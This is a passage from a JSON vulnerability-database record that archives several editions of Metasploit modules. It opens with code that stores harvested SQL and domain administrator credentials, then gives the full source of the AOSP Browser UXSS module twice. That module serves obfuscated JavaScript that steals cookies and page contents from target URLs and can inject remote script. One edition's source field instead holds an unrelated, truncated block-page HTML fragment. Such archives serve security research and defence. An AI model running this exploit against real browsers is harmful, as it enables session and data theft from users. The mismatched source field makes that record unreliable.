loot[database_type],\n protocol: 'tcp',\n workspace_id: myworkspace_id,\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n # If it's Oracle, use the Oracle port, else use MSSQL\n if loot[database_type] =~ /Oracle/i\n database_login_data[:port] = 1521\n else\n database_login_data[:port] = 1433\n end\n create_credential_login(database_login_data)\n # Skip creating the Login, but tell the user about it if we cannot resolve the DB Server Hostname\n rescue SocketError\n print_error \"Could not resolve Database Server Hostname.\"\n end\n\n print_status(\"#{rhost}:#{rport} - Stored SQL credentials: #{loot[database_server_name]}:#{loot[schema_owner]}:#{loot[database_pw]}\")\n end\n\n if loot[domain_admin_name] and loot[domain_admin_pw]\n report_credential_core({\n password: loot[domain_admin_pw],\n username: loot[domain_admin_name].split('\\\\')[1],\n domain: loot[domain_admin_name].split('\\\\')[0]\n })\n\n print_status(\"#{rhost}:#{rport} - Stored domain credentials: #{loot[domain_admin_name]}:#{loot[domain_admin_pw]}\")\n end\n end\n\n\n def report_credential_core(cred_opts={})\n # Set up the has for our Origin service\n origin_service_data = {\n address: rhost,\n port: rport,\n service_name: 'Domain',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: self.fullname,\n private_type: :password,\n private_data: cred_opts[:password],\n username: cred_opts[:username]\n }\n\n if cred_opts[:domain]\n credential_data.merge!({\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: cred_opts[:domain]\n })\n elsif cred_opts[:sid]\n credential_data.merge!({\n realm_key: Metasploit::Model::Realm::Key::ORACLE_SYSTEM_IDENTIFIER,\n realm_value: cred_opts[:sid]\n })\n end\n\n credential_data.merge!(origin_service_data)\n create_credential(credential_data)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": 
"2019-07-05T15:42:45", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 81}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-05T19:41:49", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2019-07-05T19:41:49"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310883077", "OPENVAS:1361412562310876554", "OPENVAS:1361412562310876555", "OPENVAS:1361412562310883078", "OPENVAS:1361412562310891843", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310844077", "OPENVAS:1361412562310876552", "OPENVAS:1361412562310704475"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "pentestpartners", "idList": 
["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}, {"type": "zdt", "idList": ["1337DAY-ID-32952", "1337DAY-ID-32941"]}], "modified": "2019-07-05T19:41:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. 
If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 
'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-05T19:41:49", "differentElements": ["sourceData"], "edition": 82}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "66526d54b1c2468cc1565418836e346e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of 
Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-06T11:41:02", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-07-06T11:41:02"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310883077", "OPENVAS:1361412562310883078", "OPENVAS:1361412562310876555", "OPENVAS:1361412562310876554", "OPENVAS:1361412562310891843", "OPENVAS:1361412562310844077", "OPENVAS:1361412562310876552", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310852608"]}, {"type": "zdt", "idList": ["1337DAY-ID-32954", "1337DAY-ID-32952"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}], "modified": "2019-07-06T11:41:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-06T11:41:02", "differentElements": ["sourceData"], "edition": 83}, {"bulletin": {"id": 
"MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-06T13:36:19", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2019-07-06T13:36:19"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891844", "OPENVAS:1361412562310883077", "OPENVAS:1361412562310876554", "OPENVAS:1361412562310883078", "OPENVAS:1361412562310876555", "OPENVAS:1361412562310891843", "OPENVAS:1361412562310844077", "OPENVAS:1361412562310876552", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310852609"]}, {"type": "zdt", "idList": ["1337DAY-ID-32954", "1337DAY-ID-32952"]}, {"type": "ubuntu", "idList": ["USN-4038-4", "USN-4038-3"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}], "modified": "2019-07-06T13:36:19"}}, "objectVersion": "1.4", "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to 
inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + 
datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-06T13:36:19", "differentElements": ["sourceData"], "edition": 84}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "2d09754ccb929cab1bcefa40f9d1ecc9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. 
Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-17T22:47:50", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2019-07-17T22:47:50"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:92972EAF9D82078A646C89FF655246FA"]}, {"type": "schneier", "idList": ["SCHNEIER:96A2F50F6F033D167626C5A4E1D165EB"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704482", "OPENVAS:1361412562310891853", "OPENVAS:1361412562310704481", "OPENVAS:1361412562310704480", "OPENVAS:1361412562310704479", "OPENVAS:1361412562310815247", "OPENVAS:1361412562310891852", "OPENVAS:1361412562310891850", "OPENVAS:1361412562310704478", "OPENVAS:1361412562310891851"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153627"]}, {"type": "exploitdb", "idList": ["EDB-ID:47120"]}], "modified": "2019-07-17T22:47:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "<!DOCTYPE html>\n<html>\n\t<head>\n\t\t<meta charset=\"utf-8\">\n\t\t<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n\t\t<title>Block page</title>\n\t\t<link rel=\"stylesheet\" type=\"text/css\" href=\"https://kliksafestoppagina.kliksafe.nl/2017ns/css/Font/Fonts.css\">\n\t\t<link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.8.2/css/all.css\" 
integrity=\"sha384-oS3vJWv+0UjzBfQzYUhtDYW+Pj2yciDJxpsK1OYPAYjqT085Qq/1cq5FLXAZQ7Ay\" crossorigin=\"anonymous\">\n\t\t<style>\n\t\t\thtml,body \t{\n\t\t\t\t\t\tbackground-color:#444;\n\t\t\t\t\t\tcolor:#FFF;\n\t\t\t\t\t\theight: 100%;\n\t\t\t\t\t\twidth: 100%;\n\t\t\t\t\t\tpadding: 0px;\n\t\t\t\t\t\tmargin: 0px;\n\t\t\t\t\t\tfont-size: 20px;\n\t\t\t\t\t\t}\n\t\t\t.header \t{\n\t\t\t\t\t\theight: 50%;\n\t\t\t\t\t\twidth: 100%;\n\t\t\t\t\t\tmargin: 0px;\n\t\t\t\t\t\tbackground: url('